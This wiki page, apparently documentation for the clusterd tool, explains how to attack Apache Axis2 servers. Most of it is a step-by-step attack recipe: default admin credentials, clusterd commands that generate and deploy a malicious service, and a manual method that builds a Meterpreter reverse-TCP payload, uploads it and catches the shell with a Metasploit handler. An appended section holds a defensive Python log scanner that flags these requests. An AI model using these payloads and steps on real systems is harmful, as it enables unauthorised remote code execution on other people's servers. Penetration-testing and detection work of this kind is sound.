Stephen Breen edited this page May 7, 2014 · 5 revisions

## Apache Axis2

Apache Axis2 is a software stack for creating and serving XML web services written in Java. There are two approaches to attacking an Axis2 server:

* Attacking the management interface
* Attacking the web services themselves

### Attacking the management interface

We will begin with attacking the management interface. The interface can USUALLY be found at http://<host>:<port>/axis2/axis2-admin. The "/axis2/" portion of the URL may very well differ; it will be the path to the axis2 installation. Also keep in mind that Axis2 usually runs on TOP of Tomcat or another application server, deployed as a module. If you discover a Tomcat server and are unable to exploit it, see if the Axis2 paths exist. The default username and password for the admin interface is:

* admin/axis2

These credentials are included by default up to the current version and are often overlooked, since a typical Axis2 deployment does not require administrative interaction with the web interface.

#### Clusterd Usage

Clusterd supports deployment to Axis2 when administrative credentials are known, and payload generation to create malicious Axis2 services. The Axis2 modules are not version dependent; deployment with credentials should work across all versions of Axis2 to date.

To generate a payload, simply run:

* sudo python clusterd.py -a axis2 --gen-payload localhost:4444

To deploy and invoke:

* sudo python clusterd.py -a axis2 -i localhost -p 8080 --deploy shell.jar --deployer service_upload --usr-auth admin:axis2 --invoke

The service_upload deployer uses the Axis2 web interface to upload a payload. Axis2 also supports a REST interface for deployment.

#### Manually Exploiting the Admin Interface

  1. Generate a payload. This is most easily accomplished using clusterd as described above. Msfpayload does not natively support generation of payloads that are compatible with Axis2. If you prefer to generate a custom payload, consider reviewing the source in clusterd's generate_payload.py. In outline, the payload is built as follows:

     * msfpayload java/meterpreter/reverse_tcp LHOST=localhost LPORT=4444 R > shell.jar
     * Create "META-INF/services.xml" in the JAR file (see clusterd source for contents of services.xml)
     * Add PayloadServlet.class (included in clusterd) to "metasploit/PayloadServlet.class" in the JAR.

  2. Upload the payload at https://<host>:<port>/axis2/axis2-admin/upload

  3. Confirm through the admin interface that the service exists and is activated. Under "List Services" find and click on the name of the service; it should be "shell" for clusterd payloads.

  4. Start a reverse handler for the payload:

     • use multi/handler
     • set PAYLOAD java/meterpreter/reverse_tcp
     • set LPORT 4444
     • set LHOST x.x.x.x
     • exploit

  5. Invoke the service by accessing http://<host>:<port>/axis2/services/shell

### Attacking Axis2 Web Services

Attacking web services is a subject on its own; however, the following may be helpful when gathering information on Axis2 web services:

* http://<host>:<port>/axis2/services/listServices
  * Provides a list of available services
* http://<host>:<port>/axis2/services/Version?wsdl
  * Provides a WSDL that can be imported to SOAPUI for a given service
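From the defending side, every path on this page (the admin interface, its upload form, and invocations of services such as "shell" that were never deployed on purpose) shows up in the application server's access log. The following is an added example, not part of clusterd or Axis2, that scans Tomcat-style access-log lines for those paths; the log format, the EXPECTED_SERVICES allowlist and the sample lines are all constructed assumptions.

```python
import re
from typing import Dict, List, Optional

# Assumed Tomcat/Apache "common" access-log layout: ip ident user [ts] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" (?P<status>\d{3}) \S+'
)

# Services that are expected on this host (constructed allowlist for the example).
EXPECTED_SERVICES = {"Version"}

# Constructed sample lines mirroring the paths discussed on this page.
SAMPLE_LOG = """\
10.0.0.5 - - [07/May/2014:10:01:02 +0000] "GET /axis2/services/Version?wsdl HTTP/1.1" 200 1342
10.0.0.9 - - [07/May/2014:10:02:11 +0000] "GET /axis2/axis2-admin/ HTTP/1.1" 200 2210
10.0.0.9 - - [07/May/2014:10:02:40 +0000] "POST /axis2/axis2-admin/upload HTTP/1.1" 200 512
10.0.0.9 - - [07/May/2014:10:03:05 +0000] "GET /axis2/services/shell HTTP/1.1" 200 17
10.0.0.5 - - [07/May/2014:10:04:00 +0000] "GET /axis2/services/listServices HTTP/1.1" 200 890
"""

def classify(method: str, path: str) -> Optional[str]:
    """Return an alert label for a suspicious Axis2 request path, else None."""
    route = path.split("?", 1)[0]          # drop the query string (e.g. ?wsdl)
    if route.startswith("/axis2/axis2-admin/upload"):
        return "admin-upload"              # a service archive pushed through the admin UI
    if route.startswith("/axis2/axis2-admin"):
        return "admin-access"              # any use of the management interface
    m = re.match(r"^/axis2/services/([^/]+)$", route)
    if m and m.group(1) != "listServices" and m.group(1) not in EXPECTED_SERVICES:
        return "unknown-service"           # invocation of a service nobody deployed on purpose
    return None

def scan(log_text: str) -> List[Dict[str, str]]:
    """Parse access-log lines and return one finding per suspicious request."""
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # skip lines that do not match the assumed format
        label = classify(m["method"], m["path"])
        if label:
            findings.append({"ip": m["ip"], "path": m["path"], "alert": label})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Feed it the real access log (catalina's access_log valve output) instead of SAMPLE_LOG and populate EXPECTED_SERVICES from the output of listServices on a known-good deployment.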
